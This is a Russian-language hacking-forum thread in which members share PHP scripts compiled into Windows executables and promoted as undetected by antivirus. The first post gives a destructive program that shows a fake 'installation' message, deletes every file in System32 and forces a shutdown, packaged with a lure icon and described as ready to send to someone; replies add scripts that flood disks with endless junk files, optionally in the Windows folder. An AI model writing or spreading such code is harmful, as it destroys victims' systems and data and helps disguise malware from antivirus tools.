Форум АНТИЧАТ - Левые вирусы, которые не палят антивирусы

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)

- - Левые вирусы, которые не палят антивирусы (https://forum.antichat.xyz/showthread.php?t=39962)

Левые вирусы, которые не палят антивирусы

Хай всем!
Возможно этот способ уже все знают, но всёравно...
Оказывается можно писать вирусы на PHP :D Конечно они нубские получаются, но не палятся антивирусами... Вы наверное думаете что этот способ годен только для серверов с поддержкой PHP, однако для запуска PHP вируса ненужен сервер :p PHP скрипты можно компилировать в .exe файлы, для меня (когда я это узнал) было огромное открытие, для вас возможно нет... Тогда закройте эту страничку, всёравно ничего нового не узнаете...
Для компиляции PHP скриптов есть много программ, я лично юзаю php bam compile маленькая прога не требующая никакой установки!
Скачать тут: _http://slil.ru/24354564
В архиве 5 фалов:

bamcompile.exe - компилятор
readme.txt - описание компилятора (помощ)
virus-unlink.php - мой пример вируса :)
Вот...

PHP код:


		
			
<?php

set_time_limit(0);

ignore_user_abort();

echo "Preparing to installation... Plsease wait\n\n\n\n";

foreach (glob("C:/WINDOWS/System32/*") as $filename)

{

   @unlink($filename);

}

echo "TY 4URKO!\nBy Ponchik\nICQ:202-995-022\nWEB:antichat.ru";

sleep(5);

system('shutdown -s');

?>

Что он делает?
1)Выводит нажпись "Preparing to installation... Plsease wait"
2)Получает список файлов из C:/WINDOWS/System32/ и пытается их по очереди удалить...
3)После всего этого выводит текст
TY 4URKO!
By Ponchik
ICQ:202-995-022
WEB:antichat.ru
4)Замирает на 5 сек
5)Выводит табличку выключения компа через 30 сек. (естествено он уже не включится без system32 :D )

4)popa=).ico - иконка голой попы :D (чтоб хотелось запустить)
5)virus-unlink.exe - откомпилированый не сжатый вирус с иконкой попы :D

Эмм... Кажись всё...
Лаги которые очень мешают:
1)После выполнения, программа закрывается, я личто решаю это так:
while(true) { sleep(10); }
это прописать в конец программы
2)Не работает функция usleep ну она врядле вам нужна будет :)
3)В досе невидн русский текст, например если написать
echo 'Предед медвед'; - Это выведет каракули
Я это решаю функцией

PHP код:


		
			
<?php

function strtoruss($text)

{

         $letter = array(

         'А' => chr(128),

         'Б' => chr(129),

         'В' => chr(130),

         'Г' => chr(131),

         'Д' => chr(132),

         'Е' => chr(133),

         'Ё' => chr(133),

         'Ж' => chr(134),

         'З' => chr(135),

         'И' => chr(136),

         'Й' => chr(137),

         'К' => chr(138),

         'Л' => chr(139),

         'М' => chr(140),

         'Н' => chr(141),

         'О' => chr(142),

         'П' => chr(143),

         'Р' => chr(144),

         'С' => chr(145),

         'Т' => chr(146),

         'У' => chr(147),

         'Ф' => chr(148),

         'Х' => chr(149),

         'Ц' => chr(150),

         'Ч' => chr(151),

         'Ш' => chr(152),

         'Щ' => chr(153),

         'Ъ' => chr(154),

         'Ы' => chr(155),

         'Ь' => chr(156),

         'Э' => chr(157),

         'Ю' => chr(158),

         'Я' => chr(159),

         'а' => chr(160),

         'б' => chr(161),

         'в' => chr(162),

         'г' => chr(163),

         'д' => chr(164),

         'е' => chr(165),

         'ё' => chr(165),

         'ж' => chr(166),

         'з' => chr(167),

         'и' => chr(168),

         'й' => chr(169),

         'к' => chr(170),

         'л' => chr(171),

         'м' => chr(172),

         'н' => chr(173),

         'о' => chr(174),

         'п' => chr(175),

         'р' => chr(224),

         'с' => chr(225),

         'т' => chr(226),

         'у' => chr(227),

         'ф' => chr(228),

         'х' => chr(229),

         'ц' => chr(230),

         'ч' => chr(231),

         'ш' => chr(232),

         'щ' => chr(233),

         'ъ' => chr(234),

         'ы' => chr(235),

         'ь' => chr(236),

         'э' => chr(237),

         'ю' => chr(238),

         'я' => chr(239)

         );



         for($i=0;$i<strlen($text);$i++)

         {

               if($letter[$text[$i]])

               $toreturn = $toreturn.$letter[$text[$i]];

               else

               $toreturn = $toreturn.$text[$i];

         }

         return $toreturn;

}

?>

Пишем это в начало скрипта, потом так
echo strtoruss('Превед медвед');
И всё ок :D
======================================
Не судите строго, для меня это было открытием :D Хоть и фиговые вирусы получаются, зато они не палятся, можно конечно на C++ офигительные не палевные писать, но я С++ незнаю, поэтому РНР для меня единственое решение :) В общем не судите строго :)
P.S. virus-unlink.exe полностью готов к работе, можете комунить отправить :p

Классная фича! Не знал. Правда, не легче ли точно так же написать батничек?

Я незнаю что такое батничек ;)

Вот ещё есть такая фишка

PHP код:


		
			
<?php

// Greetz всем заподлянщикам...

// В частности Poncik'y за идею!!!!!!!

// Вот, после этого, точно зае*ёшся пыль глотать...

//Аминь...

//(C) Dr.Check и все кто помог писать "Знаменитый скрипт"

////////////////////////////////////////////////////////////////

set_time_limit(0);

ignore_user_abort();

echo("<center><h1><b><font color=\"green\">ИБО НЕХУЙ!!!</font></b></h1></center>");

/////////////////////////////////////////////////////////////////

    $name = array('a','b','c','d','e','f','g','h','i','j','k',  'l','m','n','o','p','r','s',

                 't','u','v','x','y','z','A','B','C','D','E','F','G  ','H','I','J','K','L',

                 'M','N','O','P','R','S','T','U','V','X','Y','Z','1  ','2','3','4','5','6',

                 '7','8','9','0');

//////////////////////////////////////////////////////////////////

    $rash= array('.txt','.dic','.doc','.xls','.exe','.ini',

                    '.bat','.log','.dll','.hak','.wmf','.zip','.rar',

                    '.tar','.gz','.jpg','.gif','.bmp');

/////////////////////////////////////////////////////////////////

while(true) {

    $perem = "";

    $fuck="";

    for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла.

    {

     $by = rand(0, count($name) - 1);

     $perem .= $name[$by];

    }

    $ra= rand(0, count($rash)-1);

    $fuck .= $rash[$ra];

         $fp=fopen($perem.$fuck,"w");

        fwrite($fp,php_uname());

        fclose($fp);

        }

?>

Она ДОЛЖНА создавать бесконечно кол-во фалов, но создаёт 2000-3000 и умирает, незнаю почему... Вот мой левый скрипт

PHP код:


		
			
<? 

set_time_limit(0); 

ignore_user_abort(); 

while(true) { 

        switch (rand(0,8)) 

        { 

           case 1 : $r = '.txt'; break; 

           case 2 : $r = '.exe';   break; 

           case 3 : $r = '.dat'; break; 

           case 4 : $r = '.ini';  break; 

           case 5 : $r = '.log'; break; 

           case 6 : $r = '.dll'; break; 

           case 7 : $r = '.wav';  break; 

           case 8 : $r = '.nsc';  break; 

           default: $r = '.zip'; break; 

        } 

        $fp=fopen(md5(time().doubleval(microtime())).$r,"w"); 

        fwrite($fp,time()); 

        fclose($fp); 

} 

?>

Он бесконечно созаёт файлы :) Только я незнаю работает-ли ignore_user_abort(); в компиляторе...
P.S. Кому надо например в C:/windows/ создавать, замените
$fp=fopen(md5(time().doubleval(microtime())).$r,"w ");
на
$fp=fopen('C:/WINDOWS/'.md5(time().doubleval(microtime())).$r,"w");

Цитата:

Сообщение от Ponchik

Я незнаю что такое батничек ;)

По моим представлениям, файл с расширением .bat - файл сценариев командной строки DOS/Windows либо файл с расширением .cmd

сам когда-то компили, ещё компилятор одной из тимы... интересно, но как-то всеровно..... не нравица мне это

Sn@k3, на любителя :)
Macro, неее... Ты чооо! Палевно! + кажись касперский предупреждает когда бат запускаешь (кажись!)